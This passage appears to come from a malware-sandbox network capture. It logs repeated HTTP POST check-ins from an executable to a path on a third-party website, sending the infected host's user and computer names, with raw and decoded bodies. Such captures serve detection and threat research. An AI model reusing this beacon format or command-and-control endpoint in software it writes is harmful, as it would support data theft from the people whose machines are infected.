                                          Connection: close
                                          Feb 22, 2021 19:13:39.023402929 CET | 1848 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:39.392492056 CET | 1912 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:39 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          28 | 192.168.2.4 | 49784 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:39.984081984 CET | 2001 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:40.320997953 CET | 2029 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:40.691271067 CET | 2188 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          29 | 192.168.2.4 | 49788 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:41.300879002 CET | 2227 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:41.637780905 CET | 2410 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:42.004107952 CET | 2418 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:41 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.4 | 49750 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:06.053559065 CET | 1449 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:06.392352104 CET | 1538 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:06.769673109 CET | 1538 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          30 | 192.168.2.4 | 49790 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:42.586766958 CET | 2468 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:42.921735048 CET | 2500 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:43.288108110 CET | 2500 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:43 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          31 | 192.168.2.4 | 49792 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:43.872009993 CET | 2501 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:44.207918882 CET | 2502 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:44.576299906 CET | 2502 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:44 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          32 | 192.168.2.4 | 49793 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:45.134991884 CET | 2503 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:45.470527887 CET2503OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:45.838083982 CET | 2504 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:45 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          33 | 192.168.2.4 | 49794 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:46.448703051 CET | 2505 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:46.795232058 CET | 2505 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:47.172113895 CET | 2505 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:47 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          34 | 192.168.2.4 | 49795 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:47.761298895 CET | 2506 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:48.099041939 CET | 2506 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:48.467871904 CET | 2507 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:48 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          35 | 192.168.2.4 | 49796 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:49.047257900 CET | 2508 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:49.382508039 CET | 2508 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:49.748456955 CET | 2508 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:49 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          36 | 192.168.2.4 | 49797 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:50.324886084 CET | 2509 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:50.663357019 CET | 2509 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:51.031461954 CET | 2510 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:50 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          37 | 192.168.2.4 | 49798 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:51.622675896 CET | 2511 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:51.961210966 CET | 2511 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:52.330063105 CET | 2511 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:52 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          38 | 192.168.2.4 | 49799 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:52.940188885 CET | 2512 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:53.276652098 CET | 2512 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:53.654052973 CET | 2513 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:53 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          39 | 192.168.2.4 | 49800 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:54.217315912 CET | 2528 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:54.554219961 CET | 2567 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:54.922338009 CET | 2570 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:54 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.4 | 49751 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:07.581440926 CET | 1539 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:07.923393965 CET | 1539 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:08.297547102 CET | 1539 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          40 | 192.168.2.4 | 49804 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:55.493777990 CET | 2576 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:55.828850985 CET | 2579 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:56.195640087 CET | 2582 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:56 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          41 | 192.168.2.4 | 49805 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:56.763031960 CET | 2587 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:57.098416090 CET | 2590 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:57.467051029 CET | 2594 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          42 | 192.168.2.4 | 49811 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:58.050741911 CET | 5375 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:58.390557051 CET | 5451 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:58.757900953 CET | 5451 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          43 | 192.168.2.4 | 49812 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:59.321820021 CET | 5562 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:59.665541887 CET | 5786 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:00.041541100 CET | 5787 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
